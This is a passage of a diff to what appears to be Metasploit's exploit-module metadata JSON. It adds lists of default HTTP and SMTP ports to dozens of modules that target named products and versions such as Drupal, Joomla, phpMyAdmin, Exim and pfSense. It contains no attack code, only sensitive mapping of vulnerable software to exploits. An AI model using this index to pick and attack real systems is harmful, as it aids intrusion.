"autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54359,6 +72194,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54391,6 +72241,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -54423,6 +72288,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD" ], @@ -54456,6 +72336,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "EPMP" ], @@ -54490,6 +72385,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -54522,6 +72432,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54555,6 +72480,12 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "pfSense <= 2.4.1" ], @@ -54590,6 +72521,21 @@ "platform": "PHP", "arch": "php", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -54623,6 +72569,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -54658,6 +72619,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54691,6 +72667,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ftp(1)" ], @@ -54725,6 +72707,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54758,6 +72755,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix CMD", "VMTurbo Operations Manager" @@ -54793,6 +72805,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54826,6 +72853,12 @@ "platform": "Unix", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -54857,6 +72890,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54894,6 +72933,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54928,6 +72973,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Exim < 4.86.2" ], @@ -54963,6 +73014,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -54994,6 +73051,12 @@ "platform": "BSD,Linux,Unix", "arch": "cmd, x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Command payload", "Linux x86", @@ -55029,6 +73092,12 @@ "platform": "Unix", "arch": "cmd", "rport": 3632, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -55063,6 +73132,12 @@ "platform": "Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -55099,6 +73174,12 @@ "platform": "Unix", "arch": "cmd", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -55133,6 +73214,12 @@ "platform": "Unix", "arch": "cmd", "rport": 783, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -55167,6 +73254,12 @@ "platform": "Unix", "arch": "cmd", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -55200,6 +73293,12 @@ "platform": "Unix", "arch": "cmd", "rport": 10050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -55234,6 +73333,12 @@ "platform": "Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -55268,6 +73373,18 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -55309,6 +73426,18 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -55347,6 +73476,18 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -55380,6 +73521,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SonicWall Global Management System Virtual Appliance" ], @@ -55414,6 +73570,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "vAPV 8.3.2.17 / vxAG 9.2.0.34" ], @@ -55450,6 +73612,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix-based Tectia SSH 6.3 or prior" ], @@ -55484,6 +73652,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ActualAnalyzer <= 2.81" ], @@ -55517,6 +73700,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Western Digital Arkeia Appliance 10.0.10" ], @@ -55552,6 +73750,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55587,6 +73800,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55620,6 +73848,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55655,6 +73898,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55688,6 +73946,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55723,6 +73996,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -55756,6 +74044,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55791,6 +74094,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55824,6 +74142,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "carberp" ], @@ -55859,6 +74192,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55891,6 +74239,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Clipbucket 2.6" ], @@ -55926,6 +74289,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55963,6 +74341,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "DataLife Engine 9.7" ], @@ -55996,6 +74389,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56028,6 +74436,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56069,6 +74492,21 @@ "platform": "Linux,PHP,Unix", "arch": "php, cmd, x86, x64", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (PHP In-Memory)", "Automatic (PHP Dropper)", @@ -56083,7 +74521,7 @@ "Drupal 8.x (Unix In-Memory)", "Drupal 8.x (Linux Dropper)" ], - "mod_time": "2018-08-27 13:11:22 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb", "is_install_path": true, "ref_name": "unix/webapp/drupal_drupalgeddon2", @@ -56116,6 +74554,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56150,6 +74603,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "EGallery 1.2" ], @@ -56183,6 +74651,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -56217,6 +74700,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Foswiki 1.1.5" ], @@ -56253,6 +74751,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "FreePBX" ], @@ -56284,6 +74797,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56316,6 +74844,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -56349,6 +74892,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56382,6 +74940,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56415,6 +74988,21 @@ "platform": "Linux,Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56450,6 +75038,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Hastymail 2.1.1 RC1" ], @@ -56483,6 +75086,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -56519,6 +75137,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Horde 5" ], @@ -56552,6 +75185,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)" ], @@ -56586,6 +75234,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "InstantCMS 1.6" ], @@ -56623,6 +75286,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Invision IP.Board 3.3.4" ], @@ -56658,6 +75336,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4" ], @@ -56692,6 +75385,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla 3.7.0" ], @@ -56726,6 +75434,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56763,6 +75486,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla 3.x <= 3.4.4" ], @@ -56801,6 +75539,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4" ], @@ -56835,6 +75588,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56868,6 +75636,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Kimai version 0.9.2.x (PHP Payload)" ], @@ -56901,6 +75684,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -56922,7 +75720,7 @@ "disclosure_date": "2015-02-11", "type": "exploit", "author": [ - "Rob Carr " + "rastating" ], "description": "This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of\n session and file validation in the file_to_index.php script. It allows unauthenticated\n users to upload files of any type and subsequently execute PHP scripts in the context of\n the web server.", "references": [ @@ -56933,10 +75731,25 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Maarch LetterBox 2.8" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/maarch_letterbox_file_upload", @@ -56966,6 +75779,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56997,6 +75825,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57035,6 +75878,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MoinMoin 1.9.5" ], @@ -57069,6 +75927,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57106,6 +75979,21 @@ "platform": "Linux,Unix", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target", "Appliance Nagios XI 2012R1.3 (CentOS 6.x)", @@ -57140,6 +76028,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -57174,6 +76077,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Graph Explorer Component prior to 1.3" ], @@ -57207,6 +76125,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Narcissus" ], @@ -57250,6 +76183,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -57282,6 +76230,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OpenEMR" ], @@ -57319,6 +76282,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OpenEMR 4.1.1" ], @@ -57354,6 +76332,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OpenSIS version 4.5 to 5.2" ], @@ -57388,6 +76381,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57429,6 +76437,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57462,6 +76485,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 8899, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57494,6 +76532,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57529,6 +76582,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57563,6 +76631,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -57594,6 +76677,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57627,6 +76725,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57661,6 +76774,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57695,6 +76823,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57733,6 +76876,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "phpbb <=2.0.10", @@ -57770,6 +76928,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57807,6 +76980,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)" ], @@ -57840,6 +77028,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Piwik" ], @@ -57874,6 +77077,21 @@ "platform": "Linux,PHP", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -57907,6 +77125,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ProjectSend (PHP Payload)" ], @@ -57940,6 +77173,21 @@ "platform": "Unix", "arch": "cmd", "rport": 1220, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57973,6 +77221,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58007,6 +77270,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SePortal" ], @@ -58039,6 +77317,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -58071,6 +77364,21 @@ "platform": "Unix", "arch": "cmd", 